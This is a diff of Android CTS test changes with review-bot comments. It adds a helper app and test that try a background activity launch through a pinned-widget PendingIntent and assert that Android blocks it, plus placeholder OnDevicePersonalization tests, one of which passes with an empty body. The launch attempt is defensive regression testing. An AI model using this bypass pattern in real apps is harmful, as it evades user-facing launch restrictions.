+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+<configuration description="Config for CTS OnDevicePersonalization test cases">
+ <option name="test-suite-tag" value="cts" />
+ <option name="config-descriptor:metadata" key="component" value="framework" />
+ <option name="config-descriptor:metadata" key="parameter" value="instant_app" />
+ <option name="config-descriptor:metadata" key="parameter" value="not_multi_abi" />
+ <option name="config-descriptor:metadata" key="parameter" value="secondary_user" />
+ <option name="config-descriptor:metadata" key="mainline-param" value="com.google.android.ondevicepersonalization.apex" />
+
+ <target_preparer class="com.android.tradefed.targetprep.suite.SuiteApkInstaller">
+ <option name="cleanup-apks" value="true" />
+ <option name="test-file-name" value="CtsOnDevicePersonalizationTestCases.apk" />
+ </target_preparer>
+
+ <test class="com.android.tradefed.testtype.AndroidJUnitTest" >
+ <option name="package" value="android.ondevicepersonalization.cts" />
+ <option name="hidden-api-checks" value="false" />
+ </test>
+
+ <object type="module_controller" class="com.android.tradefed.testtype.suite.module.MainlineTestModuleController">
+ <option name="mainline-module-package-name" value="com.google.android.ondevicepersonalization" />
+ </object>
+</configuration>
\ No newline at end of file
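Review bot: `hidden-api-checks` is set to `false` although the module is built with `platform_apis: false` and the only test added in this change has an empty body, so nothing visible needs hidden-API enforcement switched off. Leaving it disabled lets later tests reach non-SDK interfaces without anyone noticing; suggest removing the option until a test needs it, and then adding a comment that names the API. The file also has no trailing newline.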
diff --git a/tests/ondevicepersonalization/OWNERS b/tests/ondevicepersonalization/OWNERS
new file mode 100644
index 0000000..57cdbaf
--- /dev/null
+++ b/tests/ondevicepersonalization/OWNERS
@@ -0,0 +1,2 @@
+# Bug component: 1117807
+include platform/packages/modules/OnDevicePersonalization:/OWNERS
\ No newline at end of file
diff --git a/tests/ondevicepersonalization/TEST_MAPPING b/tests/ondevicepersonalization/TEST_MAPPING
new file mode 100644
index 0000000..8d96b25
--- /dev/null
+++ b/tests/ondevicepersonalization/TEST_MAPPING
@@ -0,0 +1,7 @@
+{
+ "presubmit": [
+ {
+ "name": "CtsOnDevicePersonalizationTestCases"
+ }
+ ]
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java b/tests/ondevicepersonalization/src/android/ondevicepersonalization/cts/OnDevicePersonalizationServiceTest.java
similarity index 65%
copy from tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
copy to tests/ondevicepersonalization/src/android/ondevicepersonalization/cts/OnDevicePersonalizationServiceTest.java
index 4416990..c82e039 100644
--- a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
+++ b/tests/ondevicepersonalization/src/android/ondevicepersonalization/cts/OnDevicePersonalizationServiceTest.java
@@ -14,9 +14,17 @@
* limitations under the License.
*/
-package android.security.cts.CVE_2022_20143;
+package android.ondevicepersonalization.cts;
-import android.app.Activity;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import org.junit.runners.JUnit4;
-public class PocActivity extends Activity {
+/**
+ * Test of {@link OnDevicePersonalizationManager}
+ */
+@RunWith(JUnit4.class)
+public class OnDevicePersonalizationServiceTest {
+ @Test
+ public void test() throws Exception {}
}
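Review bot: `test()` has an empty body, so it passes unconditionally, and the TEST_MAPPING added in this change puts the module in presubmit, where it will report green without exercising anything. If this is scaffolding, mark it as such above the method, e.g. `// TODO(b/<bug-id>): placeholder until real OnDevicePersonalizationManager tests land`, or replace it with a real assertion. The Javadoc `{@link OnDevicePersonalizationManager}` has no matching import in the visible lines, so the link likely does not resolve, and the class name says Service while the Javadoc says Manager.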
diff --git a/tests/pdf/AndroidManifest.xml b/tests/pdf/AndroidManifest.xml
index 6010dbc..2d65f1c 100644
--- a/tests/pdf/AndroidManifest.xml
+++ b/tests/pdf/AndroidManifest.xml
@@ -28,6 +28,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.graphics.pdf.cts"
android:label="CTS tests of android.graphics.pdf">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/providerui/AndroidManifest.xml b/tests/providerui/AndroidManifest.xml
index 711ab0e..a14df70 100644
--- a/tests/providerui/AndroidManifest.xml
+++ b/tests/providerui/AndroidManifest.xml
@@ -56,6 +56,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.providerui.cts"
android:label="CTS UI tests of android.provider">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/sensor/AndroidManifest.xml b/tests/sensor/AndroidManifest.xml
index 1cce32d..e693c87 100644
--- a/tests/sensor/AndroidManifest.xml
+++ b/tests/sensor/AndroidManifest.xml
@@ -34,6 +34,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.hardware.sensor.cts"
android:label="CTS sensor tests">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/accounts/AndroidManifest.xml b/tests/tests/accounts/AndroidManifest.xml
index acf78ad..999a3c6 100644
--- a/tests/tests/accounts/AndroidManifest.xml
+++ b/tests/tests/accounts/AndroidManifest.xml
@@ -69,6 +69,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.accounts.cts"
android:label="CTS tests for android.accounts">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/activityrecognition/AndroidManifest.xml b/tests/tests/activityrecognition/AndroidManifest.xml
index c251d6c..5fb7c8f 100644
--- a/tests/tests/activityrecognition/AndroidManifest.xml
+++ b/tests/tests/activityrecognition/AndroidManifest.xml
@@ -39,6 +39,9 @@
android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.activityrecognition.cts"
android:label="CTS activity recognition tests">
+ <meta-data
+ android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/animation/AndroidManifest.xml b/tests/tests/animation/AndroidManifest.xml
index 73f264f..6e8704e 100644
--- a/tests/tests/animation/AndroidManifest.xml
+++ b/tests/tests/animation/AndroidManifest.xml
@@ -31,6 +31,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.animation.cts"
android:label="CTS tests for android.animation package">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/app.usage/AndroidManifest.xml b/tests/tests/app.usage/AndroidManifest.xml
index bc64736..3744b05 100644
--- a/tests/tests/app.usage/AndroidManifest.xml
+++ b/tests/tests/app.usage/AndroidManifest.xml
@@ -79,6 +79,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.app.usage.cts"
android:label="CTS tests of android.app.usage">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/app/AndroidManifest.xml b/tests/tests/app/AndroidManifest.xml
index f888da4..e46d311 100644
--- a/tests/tests/app/AndroidManifest.xml
+++ b/tests/tests/app/AndroidManifest.xml
@@ -43,6 +43,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.app.cts"
android:label="CTS tests of android.app">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/appcomponentfactory/AndroidManifest.xml b/tests/tests/appcomponentfactory/AndroidManifest.xml
index e6f3c99..d943327 100644
--- a/tests/tests/appcomponentfactory/AndroidManifest.xml
+++ b/tests/tests/appcomponentfactory/AndroidManifest.xml
@@ -34,6 +34,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.app.componentfactory.cts"
android:label="CTS tests of android.app">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/appenumeration/AndroidManifest.xml b/tests/tests/appenumeration/AndroidManifest.xml
index 3a631e3..8e9d618 100644
--- a/tests/tests/appenumeration/AndroidManifest.xml
+++ b/tests/tests/appenumeration/AndroidManifest.xml
@@ -51,6 +51,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.appenumeration.cts"
android:label="CTS tests for app enumeration">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/appop/src/android/app/appops/cts/AppOpsLoggingTest.kt b/tests/tests/appop/src/android/app/appops/cts/AppOpsLoggingTest.kt
index 4db7ea0..97610fa 100644
--- a/tests/tests/appop/src/android/app/appops/cts/AppOpsLoggingTest.kt
+++ b/tests/tests/appop/src/android/app/appops/cts/AppOpsLoggingTest.kt
@@ -969,7 +969,7 @@
fun checkAttributionsAreUserVisible() {
val pi = context.packageManager.getPackageInfo(
TEST_SERVICE_PKG, PackageManager.PackageInfoFlags.of(GET_ATTRIBUTIONS_LONG))
- assertThat(pi.applicationInfo.areAttributionsUserVisible())
+ assertThat(pi.applicationInfo?.areAttributionsUserVisible()).isTrue()
}
@After
diff --git a/tests/tests/appwidget/Android.bp b/tests/tests/appwidget/Android.bp
index 9fc1a0d..89b1e10 100644
--- a/tests/tests/appwidget/Android.bp
+++ b/tests/tests/appwidget/Android.bp
@@ -37,6 +37,7 @@
"ctstestrunner-axt",
"junit",
"compatibility-device-util-axt",
+ "cts-wm-util",
],
libs: ["android.test.base"],
// Tag this module as a cts test artifact
@@ -51,6 +52,7 @@
":CtsAppWidgetProvider1",
":CtsAppWidgetLauncher1",
":CtsAppWidgetProvider2",
+ ":CtsAppWidgetTestCasesBalApp",
],
per_testcase_directory: true,
}
diff --git a/tests/tests/appwidget/AndroidManifest.xml b/tests/tests/appwidget/AndroidManifest.xml
index e4c683f..5d8b055 100644
--- a/tests/tests/appwidget/AndroidManifest.xml
+++ b/tests/tests/appwidget/AndroidManifest.xml
@@ -22,6 +22,7 @@
<queries>
<!-- UpdateProviderInfoTest queries widget providers. -->
<package android:name="android.appwidget.cts.widgetprovider"/>
+ <package android:name="android.appwidget.cts.appbal" />
</queries>
<application>
@@ -101,6 +102,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.appwidget.cts"
android:label="Tests for the app widget APIs.">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/appwidget/AndroidTest.xml b/tests/tests/appwidget/AndroidTest.xml
index db4aa66..96c6a1e 100644
--- a/tests/tests/appwidget/AndroidTest.xml
+++ b/tests/tests/appwidget/AndroidTest.xml
@@ -26,8 +26,8 @@
<option name="test-file-name" value="CtsAppWidgetLauncher2.apk" />
<option name="test-file-name" value="CtsAppWidgetLauncher3.apk" />
<option name="test-file-name" value="CtsAppWidgetTestCases.apk" />
+ <option name="test-file-name" value="CtsAppWidgetTestCasesBalApp.apk" />
</target_preparer>
-
<target_preparer class="com.android.tradefed.targetprep.RunCommandTargetPreparer">
<option name="run-command" value="mkdir -p /data/local/tmp/cts/widgetprovider/" />
<option name="teardown-command" value="rm -rf /data/local/tmp/cts/widgetprovider"/>
diff --git a/tests/tests/appwidget/AppBal/Android.bp b/tests/tests/appwidget/AppBal/Android.bp
new file mode 100644
index 0000000..5c4b273
--- /dev/null
+++ b/tests/tests/appwidget/AppBal/Android.bp
@@ -0,0 +1,41 @@
+// Copyright (C) 2014 The Android Open Source Project
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test {
+ name: "CtsAppWidgetTestCasesBalApp",
+ defaults: ["cts_defaults"],
+ srcs: [
+ "src/**/*.java",
+ ],
+
+ target_sdk_version: "32",
+
+ static_libs: [
+ "mockito-target-minus-junit4",
+ "ctstestrunner-axt",
+ "junit",
+ "compatibility-device-util-axt",
+ "cts-wm-util",
+ ],
+ libs: ["android.test.base"],
+ // Tag this module as a cts test artifact
+ test_suites: [
+ "cts",
+ "general-tests",
+ ],
+}
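Review bot: `target_sdk_version: "32"` pins this helper below the current SDK with no explanation. The module name suggests it exists to exercise background-activity-launch behaviour, so the pin is presumably what the test depends on, and a later routine bump would silently change what is being tested. Add a comment above the line, e.g. `// Keep at 32: <behaviour the BAL test relies on for this target SDK>`. The `static_libs` list looks copied from the main test module; whether a helper app needs `mockito-target-minus-junit4` and `junit` is worth confirming.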
diff --git a/tests/tests/appwidget/AppBal/AndroidManifest.xml b/tests/tests/appwidget/AppBal/AndroidManifest.xml
new file mode 100755
index 0000000..e0c4ed1
--- /dev/null
+++ b/tests/tests/appwidget/AppBal/AndroidManifest.xml
@@ -0,0 +1,56 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ ~ Copyright (C) 2019 The Android Open Source Project
+ ~
+ ~ Licensed under the Apache License, Version 2.0 (the "License");
+ ~ you may not use this file except in compliance with the License.
+ ~ You may obtain a copy of the License at
+ ~
+ ~ http://www.apache.org/licenses/LICENSE-2.0
+ ~
+ ~ Unless required by applicable law or agreed to in writing, software
+ ~ distributed under the License is distributed on an "AS IS" BASIS,
+ ~ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ ~ See the License for the specific language governing permissions and
+ ~ limitations under the License
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.appwidget.cts.appbal">
+ <uses-permission android:name="android.permission.QUERY_ALL_PACKAGES"/>
+
+ <queries>
+ <!-- UpdateProviderInfoTest queries widget providers. -->
+ <package android:name="android.appwidget.cts.widgetprovider"/>
+ <package android:name="android.appwidget.cts" />
+ </queries>
+ <application>
+ <activity
+ android:name="android.appwidget.cts.appbal.BalActivity"
+ android:label="BalActivity"
+ android:visibleToInstantApps="true"
+ android:exported="true">
+ <intent-filter>
+ <action android:name="android.intent.action.MAIN"/>
+ <category android:name="android.intent.category.DEFAULT" />
+ </intent-filter>
+ </activity>
+
+ <activity
+ android:name="android.appwidget.cts.appbal.EmptyActivity"
+ android:exported="true" />
+
+ <service
+ android:name="android.appwidget.cts.appbal.BalService"
+ android:exported="true" />
+
+ <receiver android:name="android.appwidget.cts.appbal.BalAppWidgetProvider"
+ android:exported="true">
+ <intent-filter>
+ <action android:name="android.appwidget.action.APPWIDGET_UPDATE"/>
+ </intent-filter>
+ <meta-data android:name="android.appwidget.provider"
+ android:resource="@xml/widget_info" />
+ </receiver>
+ </application>
+</manifest>
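Review bot: `android.permission.QUERY_ALL_PACKAGES` is requested alongside a `<queries>` block that already names the two packages this app needs to see; unless the helper must see other packages, the permission is broader than necessary and can be dropped. The `<!-- UpdateProviderInfoTest queries widget providers. -->` comment was carried over from the main manifest and does not describe this app. `EmptyActivity`, `BalService` and `BalAppWidgetProvider` are exported without `android:permission`, which is usual for a CTS helper, but a one-line comment naming the test package that calls them would record why they are exported.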
diff --git a/tests/tests/appwidget/AppBal/res/xml/widget_info.xml b/tests/tests/appwidget/AppBal/res/xml/widget_info.xml
new file mode 100644
index 0000000..b0e66ed
--- /dev/null
+++ b/tests/tests/appwidget/AppBal/res/xml/widget_info.xml
@@ -0,0 +1,24 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ -->
+<appwidget-provider
+ xmlns:android="http://schemas.android.com/apk/res/android"
+ android:minWidth="180dp"
+ android:minHeight="110dp"
+ android:updatePeriodMillis="86400000"
+ android:resizeMode="horizontal|vertical"
+ android:widgetCategory="home_screen">
+</appwidget-provider>
\ No newline at end of file
diff --git a/tests/tests/appwidget/AppBal/src/android.appwidget.cts.appbal/BalActivity.java b/tests/tests/appwidget/AppBal/src/android.appwidget.cts.appbal/BalActivity.java
new file mode 100644
index 0000000..353b751
--- /dev/null
+++ b/tests/tests/appwidget/AppBal/src/android.appwidget.cts.appbal/BalActivity.java
@@ -0,0 +1,52 @@
+/*
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package android.appwidget.cts.appbal;
+
+import android.app.Activity;
+import android.app.PendingIntent;
+import android.appwidget.AppWidgetManager;
+import android.content.Intent;
+import android.os.Bundle;
+import android.util.Log;
+
+public class BalActivity extends Activity {
+ @Override
+ protected void onCreate(Bundle savedInstanceState) {
+ super.onCreate(savedInstanceState);
+ }
+
+ @Override
+ protected void onResume() {
+ super.onResume();
+ requestAppWidget();
+ }
+
+ private void requestAppWidget() {
+ try {
+ // pinResult tries to launch a service which launches a background activity.
+ PendingIntent pinResult = PendingIntent.getService(this, 0,
+ new Intent(this, BalService.class),
+ PendingIntent.FLAG_ONE_SHOT | PendingIntent.FLAG_MUTABLE);
+ AppWidgetManager appWidgetManager = this.getSystemService(AppWidgetManager.class);
+ android.content.ComponentName firstWidgetProvider =
+ new android.content.ComponentName(this, BalAppWidgetProvider.class);
+ appWidgetManager.requestPinAppWidget(firstWidgetProvider, null, pinResult);
+ Log.i("BalActivity", "requested pin App widget");
+ } catch (Exception e) {
+ e.printStackTrace();
+ }
+ }
+}
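Review bot: `requestAppWidget()` discards the boolean returned by `requestPinAppWidget(...)` and swallows every exception with `e.printStackTrace()`, so a pin request that was rejected or threw leaves no clear signal in the test log. This helper app backs a test that asserts a background activity launch does not happen, so a silent setup failure is hard to tell apart from the platform correctly blocking the launch. Suggest capturing the result with `boolean requested = appWidgetManager.requestPinAppWidget(firstWidgetProvider, null, pinResult);`, logging it, and replacing the catch body with `Log.e("BalActivity", "requestPinAppWidget failed", e);`. The request is also issued from `onResume()`, so it is repeated each time the activity returns to the foreground; a short comment saying whether that is intended would help.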
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java b/tests/tests/appwidget/AppBal/src/android.appwidget.cts.appbal/BalAppWidgetProvider.java
similarity index 73%
copy from tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
copy to tests/tests/appwidget/AppBal/src/android.appwidget.cts.appbal/BalAppWidgetProvider.java
index 4416990..97eab2d 100644
--- a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
+++ b/tests/tests/appwidget/AppBal/src/android.appwidget.cts.appbal/BalAppWidgetProvider.java
@@ -1,5 +1,5 @@
/*
- * Copyright (C) 2022 The Android Open Source Project
+ * Copyright (C) 2018 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
@@ -13,10 +13,9 @@
* See the License for the specific language governing permissions and
* limitations under the License.
*/
+package android.appwidget.cts.appbal;
-package android.security.cts.CVE_2022_20143;
+import android.appwidget.AppWidgetProvider;
-import android.app.Activity;
-
-public class PocActivity extends Activity {
+public class BalAppWidgetProvider extends AppWidgetProvider {
}
diff --git a/tests/tests/appwidget/AppBal/src/android.appwidget.cts.appbal/BalService.java b/tests/tests/appwidget/AppBal/src/android.appwidget.cts.appbal/BalService.java
new file mode 100644
index 0000000..c529681
--- /dev/null
+++ b/tests/tests/appwidget/AppBal/src/android.appwidget.cts.appbal/BalService.java
@@ -0,0 +1,62 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.appwidget.cts.appbal;
+
+import android.app.Service;
+import android.content.Intent;
+import android.os.Handler;
+import android.os.IBinder;
+import android.util.Log;
+
+public class BalService extends Service {
+
+ Handler mHandler;
+
+ public BalService() {
+ }
+
+ @Override
+ public IBinder onBind(Intent intent) {
+ return null;
+ }
+
+ @Override
+ public void onCreate() {
+ Log.i("BalService", "Service started");
+ mHandler = new Handler();
+ mHandler.postDelayed(this::startBackgroundActivity, 1000 * 30);
+ super.onCreate();
+ }
+
+ void startBackgroundActivity() {
+ try {
+ Log.e("BalService", "Start background activity called");
+ Intent intent = new Intent(this, EmptyActivity.class);
+ intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+ this.startActivity(intent);
+
+ } catch (Exception e) {
+ Log.e("BalService", "startBackgroundActivity throws exception." + e);
+ }
+ }
+
+ @Override
+ public void onDestroy() {
+ Log.i("BalService", "Service destroyed!");
+ super.onDestroy();
+ }
+}
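Review bot: In `startBackgroundActivity()`, `Log.e("BalService", "startBackgroundActivity throws exception." + e)` concatenates the exception into the message and loses its stack trace; `Log.e("BalService", "startBackgroundActivity throws exception.", e);` keeps it. The preceding "Start background activity called" line reports normal progress and reads better as `Log.i`. The `1000 * 30` delay in `onCreate()` is what the polling loop in `RequestPinAppWidgetTest` is sized against, so a named constant with a comment naming that test would keep the two from drifting apart. The posted callback is also not removed in `onDestroy()`; if it is not meant to outlive the service, `mHandler.removeCallbacksAndMessages(null);` there would cancel it.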
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java b/tests/tests/appwidget/AppBal/src/android.appwidget.cts.appbal/EmptyActivity.java
similarity index 79%
copy from tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
copy to tests/tests/appwidget/AppBal/src/android.appwidget.cts.appbal/EmptyActivity.java
index 4416990..5b57d2c 100644
--- a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
+++ b/tests/tests/appwidget/AppBal/src/android.appwidget.cts.appbal/EmptyActivity.java
@@ -1,5 +1,5 @@
/*
- * Copyright (C) 2022 The Android Open Source Project
+ * Copyright (C) 2018 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
@@ -13,10 +13,8 @@
* See the License for the specific language governing permissions and
* limitations under the License.
*/
-
-package android.security.cts.CVE_2022_20143;
+package android.appwidget.cts.appbal;
import android.app.Activity;
-public class PocActivity extends Activity {
-}
+public class EmptyActivity extends Activity { }
diff --git a/tests/tests/appwidget/packages/src/android/appwidget/cts/packages/AppWidgetConfirmPin.java b/tests/tests/appwidget/packages/src/android/appwidget/cts/packages/AppWidgetConfirmPin.java
index 7fc7211..a8ac2ee 100644
--- a/tests/tests/appwidget/packages/src/android/appwidget/cts/packages/AppWidgetConfirmPin.java
+++ b/tests/tests/appwidget/packages/src/android/appwidget/cts/packages/AppWidgetConfirmPin.java
@@ -30,10 +30,10 @@
private PinItemRequest mRequest;
private BroadcastReceiver mReceiver;
+
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
-
try {
final LauncherApps launcherApps = getSystemService(LauncherApps.class);
mRequest = launcherApps.getPinItemRequest(getIntent());
diff --git a/tests/tests/appwidget/src/android/appwidget/cts/RequestPinAppWidgetTest.java b/tests/tests/appwidget/src/android/appwidget/cts/RequestPinAppWidgetTest.java
index 4e68779..6e9d788 100644
--- a/tests/tests/appwidget/src/android/appwidget/cts/RequestPinAppWidgetTest.java
+++ b/tests/tests/appwidget/src/android/appwidget/cts/RequestPinAppWidgetTest.java
@@ -16,20 +16,30 @@
package android.appwidget.cts;
+import static android.content.Intent.FLAG_ACTIVITY_NEW_TASK;
+import static android.server.wm.UiDeviceUtils.pressHomeButton;
+
import static org.junit.Assert.assertEquals;
+import static org.junit.Assert.assertFalse;
import static org.junit.Assert.assertNotNull;
import static org.junit.Assert.assertTrue;
+import android.app.ActivityManager;
import android.app.PendingIntent;
import android.appwidget.AppWidgetManager;
+import android.appwidget.cts.activity.EmptyActivity;
import android.appwidget.cts.common.Constants;
+import android.content.ComponentName;
import android.content.Context;
import android.content.Intent;
import android.content.pm.LauncherApps;
import android.os.Bundle;
import android.platform.test.annotations.AppModeFull;
+import android.server.wm.WindowManagerStateHelper;
+import android.util.Log;
import com.android.compatibility.common.util.CddTest;
+import com.android.compatibility.common.util.SystemUtil;
import org.junit.After;
import org.junit.Before;
@@ -46,6 +56,8 @@
private String mDefaultLauncher;
+ protected WindowManagerStateHelper mWmState = new WindowManagerStateHelper();
+
@Before
public void setUpLauncher() throws Exception {
mDefaultLauncher = getDefaultLauncher();
@@ -57,7 +69,7 @@
setLauncher(mDefaultLauncher);
}
- @CddTest(requirement="3.8.2/C-2-2")
+ @CddTest(requirement = "3.8.2/C-2-2")
private void runPinWidgetTest(final String launcherPkg) throws Exception {
setLauncher(launcherPkg + "/" + LAUNCHER_CLASS);
@@ -103,7 +115,7 @@
assertEquals("dummy-2", resultReceiver.result.getStringExtra("dummy"));
}
- @Ignore("b/265187199")
+ //@Ignore("b/265187199")
@Test
public void testPinWidget_launcher1() throws Exception {
runPinWidgetTest("android.appwidget.cts.packages.launcher1");
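Review bot: `//@Ignore("b/265187199")` re-enables `testPinWidget_launcher1` by commenting the annotation out, which leaves dead code and no record of why the referenced bug no longer applies. Either delete the line (and the `Ignore` import if nothing else in the file uses it; the import block is only partly visible here) or keep the annotation until the bug is resolved. The test method's body continues outside this hunk.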
@@ -115,9 +127,9 @@
runPinWidgetTest("android.appwidget.cts.packages.launcher2");
}
- @CddTest(requirement="3.8.2/C-2-1")
+ @CddTest(requirement = "3.8.2/C-2-1")
public void verifyIsRequestPinAppWidgetSupported(String launcherPkg, boolean expectedSupport)
- throws Exception {
+ throws Exception {
setLauncher(launcherPkg + "/" + LAUNCHER_CLASS);
Context context = getInstrumentation().getContext();
@@ -155,7 +167,52 @@
}
private void setLauncher(String component) throws Exception {
- runShellCommand("cmd package set-home-activity --user "
+ Log.i("BalActivity", "cmd package set-home-activity --user "
+ getInstrumentation().getContext().getUserId() + " " + component);
+ /*runShellCommand("cmd package set-home-activity --user "
+ + getInstrumentation().getContext().getUserId() + " " + component);*/
+ runShellCommand("cmd package set-home-activity "
+ + component);
}
+
+ @Test
+ public void testRequestPinAppWidgetNotAllBal() throws Exception {
+ String launcherPkg = "android.appwidget.cts.packages.launcher1";
+ setLauncher(launcherPkg + "/" + LAUNCHER_CLASS);
+ Context context = getInstrumentation().getContext();
+ // Request to pin widget
+ BlockingBroadcastReceiver setupReceiver = new BlockingBroadcastReceiver()
+ .register(Constants.ACTION_SETUP_REPLY);
+
+ // starts the BalActivity in the test app AppBal.
+ context.startActivity(new Intent(Intent.ACTION_MAIN)
+ .setPackage("android.appwidget.cts.appbal")
+ .addFlags(FLAG_ACTIVITY_NEW_TASK));
+
+ setupReceiver.await();
+ // Verify that the confirmation dialog was opened
+ assertTrue(setupReceiver.result.getBooleanExtra(Constants.EXTRA_SUCCESS, false));
+
+ // Accept the request
+ context.sendBroadcast(new Intent(Constants.ACTION_CONFIRM_PIN)
+ .setPackage(launcherPkg));
+
+ // Press home key to ensure stopAppSwitches is called because the last-stop-app-switch-time
+ // is a criteria of allowing background start.
+ pressHomeButton();
+ SystemUtil.runWithShellPermissionIdentity(ActivityManager::resumeAppSwitches);
+ mWmState.waitForHomeActivityVisible();
+ SystemUtil.runWithShellPermissionIdentity(ActivityManager::resumeAppSwitches);
+
+ boolean result = false;
+ // The background activity will be launched 30s after the BalService starts. The
+ // waitForFocusedActivity only waits for 5s. So put it in a for loop.
+ for (int i = 0; i < 10; i++) {
+ result = mWmState.waitForFocusedActivity(
+ "Empty Activity is launched", new ComponentName(context, EmptyActivity.class));
+ if (result) break;
+ }
+ assertFalse("Should not able to launch background activity", result);
+ }
+
}
